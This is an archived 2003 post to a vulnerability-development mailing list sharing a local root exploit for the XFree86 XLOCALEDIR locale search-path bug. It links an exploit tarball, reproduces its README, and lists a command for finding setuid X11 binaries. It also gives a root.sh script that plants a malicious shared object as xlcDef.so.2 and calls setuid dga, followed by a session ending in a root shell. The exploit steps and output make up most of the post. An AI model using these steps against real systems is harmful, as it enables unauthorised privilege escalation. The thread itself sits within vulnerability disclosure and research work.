Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: xscreensaver exploit for Redhat 7.3

From: H D Moore <sflist () digitaloffense net>
Date: Sun, 9 Mar 2003 02:51:19 -0600
An old exploit I wrote for the XLOCALEDIR search path bug, it should apply 
to a default Red Hat 7.3 install...

http://www.digitaloffense.net/shared_library_toys/xlocaledir.tar.gz

---

$ cat README
This is an exploit for a bug in xf86 4.2.0 and below, an announcement was
made by SuSE, with id SuSE-SA:2002:032.

There is one major caveat to it though, the setuid application you call
has to call XtAppInitialize as root. The "xterm" example in the
tarball will absolutely not work, because it drops privileges before
initializing the application...

$ ./xterm
** calling XtSetLanguageProc as 500/0
** called XtSetLanguageProc as 500/0
( xterm drops privs here )
** XtSetErrorHandler: 500/500
** XtAppInitialize: 500/500
** not launching a shell, since we are running as id 500 (<- exploit.so)
** XtSetErrorHandler: 500/500
** XtGetApplicationResources: 500/500
Failed to open input method
(complains that the locale stuff is broken)
(launches xterm)

So.. For this to be useful at all, you have to find a setuid app which
doesn't drop privileges until after the XtAppInitialize call :(

To get a list of all suid's linked against libX11:

# find / -perm +4000 -type f | xargs -i bash -c 'echo "Testing {}";ldd
{}|grep X11'

Once you find a linked binary (not xterm or cardinfo though), edit root.sh
and change the xterm line to the name of the binary. Execute root.sh
and see if it drops a root shell ;)

The "dga" setuid on SuSE 8.0 gives root in a default install, just don't
run the exploit with the same X display as the one you are using or dga
will more than likely crash it. Either run the exploit from the console
(or remote connection), setting the display to :0.0, or start a second X
server up just to exploit (method used below).

hdm@masada:/projects/xlocaledir> cat root.sh
#!/bin/sh
#########

rm -rf locale
cp -a /usr/lib/X11/locale locale

make clean
make
cp exploit.so locale/common/xlcDef.so.2
export XLOCALEDIR=`pwd`/locale

# call your setuid here...
/usr/X11R6/bin/dga
hdm@masada:/projects/xlocaledir> Xwrapper :1 &
[1] 1480
hdm@masada:/projects/xlocaledir>
XFree86 Version 4.2.0 / X Window System
(protocol Version 11, revision 0, vendor release 6600)
Release Date: 23 January 2002
        If the server is older than 6-12 months, or if your card is
        newer than the above date, look for a newer version before
        reporting problems.  (See http://www.XFree86.Org/)
Build Operating System: SuSE Linux [ELF] SuSE
Module Loader present
Markers: (--) probed, (**) from config file, (==) default setting,
         (++) from command line, (!!) notice, (II) informational,
         (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(==) Log file: "/var/log/XFree86.1.log", Time: Thu Sep 19 13:45:56 2002
(==) Using config file: "/etc/X11/XF86Config"
(II) [GLX]: Calling GlxExtensionInit

hdm@masada:/projects/xlocaledir> export DISPLAY=:1.0
hdm@masada:/projects/xlocaledir> ./root.sh
/bin/rm -f   exploit.o exploit.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
1 addr:0x40227000, width 1792, bank size 33357824, depth 24 planes
** attempting to drop a root shell...
sh-2.05# (II) [GLX]: Calling GlxExtensionInit

sh-2.05# id
uid=0(root) gid=100(users)
groups=100(users),14(uucp),16(dialout),17(audio),33(video),42(trusted)


On Saturday 08 March 2003 02:47 am, Adam Gilmore wrote:

I don't think there are any vulnerabilities for the default
installation of RH7.3 (as far as suid root apps go). I tested this
vulnerability on xterm as well, but it seems xterm on RH7.3 drops root
privileges before it overflows. And besides, xterm isn't setuid root on
RH7.3 by default. So this isn't a *major* security risk for rh.

-----Original Message-----
From: Inode [mailto:inode () mediaservice net]
Sent: Saturday, 8 March 2003 6:46 AM
To: vuln-dev () securityfocus com
Subject: Re: xscreensaver exploit for Redhat 7.3

Hi all,
exploit attached.

Comments are welcome.

Sincerely,

+-------------------------------------------------------------------+

| Agazzini Maurizio                       Tel:   +39-011-32.72.100  |
| Security Analyst                        Fax:   +39-011-32.46.497  |
| @ Mediaservice.net S.R.L.          D.S.D. Data Security Division  |
|
| PGP Key   : http://www.wayreth.eu.org/Inode.asc                   |
| Disclaimer: http://@Mediaservice.net/disclaimer                   |

+-------------------------------------------------------------------+
Previous By Date Next
Previous By Thread Next

Current thread: